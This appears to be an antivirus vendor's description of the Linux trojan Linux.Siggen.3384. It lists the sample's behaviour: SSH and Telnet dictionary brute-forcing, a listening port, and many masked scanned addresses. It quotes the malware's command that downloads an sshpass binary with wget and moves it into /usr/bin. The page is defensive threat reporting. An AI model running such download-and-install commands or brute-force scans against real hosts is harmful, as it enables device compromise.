Linux.Siggen.3384

Technical Information

Malicious functions:

Launches processes:

sh -c sshpass
sh -c cd /tmp;wget http://192.168.0.2:8081/mipsapp/sshpass;mv /tmp/sshpass /usr/bin/sshpass
wget http://192.168.0.2:8081/mipsapp/sshpass

Network activity:

Awaits incoming connections on ports:

0.0.0.0:7331

Establishes connection:

127.0.0.1:7331
1.#.1.1:53
19#.##8.0.2:8081

Attacks using a special dictionary (brute-force technique) via the SSH protocol

Attacks using a special dictionary (brute-force technique) via the Telnet protocol.

Sends data to the following servers:

19#.##8.218.2:80
<LOCAL_GATE>:80
19#.##8.218.3:80
19#.##8.218.6:80
19#.##8.218.7:80
19#.##8.218.4:80
19#.##8.218.5:80
19#.##8.218.8:80
19#.##8.218.9:80
<LOCAL_GATE>0:80
<LOCAL_GATE>1:80
<LOCAL_GATE>2:80
<LOCAL_GATE>4:80
<LOCAL_GATE>3:80
<LOCAL_GATE>6:80
<LOCAL_GATE>9:80
<LOCAL_GATE>5:80
<LOCAL_GATE>7:80
<LOCAL_GATE>8:80
19#.##8.218.20:80
19#.##8.218.21:80
19#.##8.218.24:80
19#.##8.218.22:80
19#.##8.218.25:80
19#.##8.218.26:80
19#.##8.218.23:80
19#.##8.218.2:8080
19#.##8.218.3:8080
19#.##8.218.6:8080
19#.##8.218.9:8080
19#.##8.218.7:8080
19#.##8.218.8:8080
<LOCAL_GATE>7:8080
19#.##8.218.5:8080
<LOCAL_GATE>3:8080
<LOCAL_GATE>2:8080
<LOCAL_GATE>:8080
<LOCAL_GATE>4:8080
<LOCAL_GATE>1:8080
<LOCAL_GATE>9:8080
19#.##8.218.26:8080
<LOCAL_GATE>5:8080
19#.##8.218.4:8080
19#.##8.218.23:8080
<LOCAL_GATE>8:8080
19#.##8.218.20:8080
<LOCAL_GATE>0:8080
19#.##8.218.21:8080
19#.##8.218.24:8080
19#.##8.218.22:8080
<LOCAL_GATE>6:8080
19#.##8.218.25:8080
19#.##8.218.28:80
19#.##8.218.30:80
19#.##8.218.29:80
19#.##8.218.31:80
19#.##8.218.34:80
19#.##8.218.37:80
19#.##8.218.33:80
19#.##8.218.36:80
19#.##8.218.27:80
19#.##8.218.32:80
19#.##8.218.35:80
19#.##8.218.38:80
19#.##8.218.39:80
19#.##8.218.40:80
19#.##8.218.31:8080
19#.##8.218.28:8080
19#.##8.218.37:8080
19#.##8.218.34:8080
19#.##8.218.36:8080
19#.##8.218.33:8080
19#.##8.218.32:8080
19#.##8.218.35:8080
19#.##8.218.38:8080
19#.##8.218.40:8080
19#.##8.218.39:8080
19#.##8.218.29:8080
19#.##8.218.27:8080
19#.##8.218.30:8080
19#.##8.218.43:80
19#.##8.218.44:80
19#.##8.218.42:80
19#.##8.218.45:80
19#.##8.218.41:80
19#.##8.218.46:80
19#.##8.218.48:80
19#.##8.218.51:80
19#.##8.218.49:80
19#.##8.218.50:80
19#.##8.218.52:80
19#.##8.218.53:80
19#.##8.218.47:80
19#.##8.218.54:80
19#.##8.218.45:8080
19#.##8.218.43:8080
19#.##8.218.44:8080
19#.##8.218.41:8080
19#.##8.218.42:8080
19#.##8.218.49:8080
19#.##8.218.53:8080
19#.##8.218.48:8080
19#.##8.218.47:8080
19#.##8.218.52:8080
19#.##8.218.46:8080
19#.##8.218.51:8080
19#.##8.218.54:8080
19#.##8.218.50:8080
19#.##8.218.57:80
19#.##8.218.55:80
19#.##8.218.56:80
19#.##8.218.61:80
19#.##8.218.59:80
19#.##8.218.58:80
19#.##8.218.60:80
19#.##8.218.63:80
19#.##8.218.64:80
19#.##8.218.62:80
19#.##8.218.66:80
19#.##8.218.67:80
19#.##8.218.65:80
19#.##8.218.68:80
19#.##8.218.57:8080
19#.##8.218.55:8080
19#.##8.218.56:8080
19#.##8.218.59:8080
19#.##8.218.60:8080
19#.##8.218.63:8080
19#.##8.218.58:8080
19#.##8.218.67:8080
19#.##8.218.66:8080
19#.##8.218.65:8080
19#.##8.218.68:8080
19#.##8.218.64:8080
19#.##8.218.62:8080
19#.##8.218.61:8080
19#.##8.218.57:22
19#.##8.218.56:22
19#.##8.218.55:22
19#.##8.218.63:22
19#.##8.218.60:22
19#.##8.218.59:22
19#.##8.218.61:22
19#.##8.218.64:22
19#.##8.218.66:22
19#.##8.218.58:22
19#.##8.218.62:22
19#.##8.218.68:22
19#.##8.218.67:22
19#.##8.218.65:22
19#.##8.218.69:80
19#.##8.218.70:80
19#.##8.218.71:80
19#.##8.218.76:80
19#.##8.218.74:80
19#.##8.218.73:80
19#.##8.218.72:80
19#.##8.218.75:80
19#.##8.218.77:80
19#.##8.218.78:80
19#.##8.218.79:80
19#.##8.218.81:80
19#.##8.218.80:80
19#.##8.218.82:80
19#.##8.218.74:8080
19#.##8.218.70:8080
19#.##8.218.69:8080
19#.##8.218.78:8080
19#.##8.218.72:8080
19#.##8.218.71:8080
19#.##8.218.79:8080
19#.##8.218.77:8080
19#.##8.218.73:8080
19#.##8.218.75:8080
19#.##8.218.81:8080
19#.##8.218.82:8080
19#.##8.218.80:8080
19#.##8.218.76:8080
19#.##8.218.80:23
19#.##8.218.81:23
19#.##8.218.76:23
19#.##8.218.78:23
19#.##8.218.72:23
19#.##8.218.77:23

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations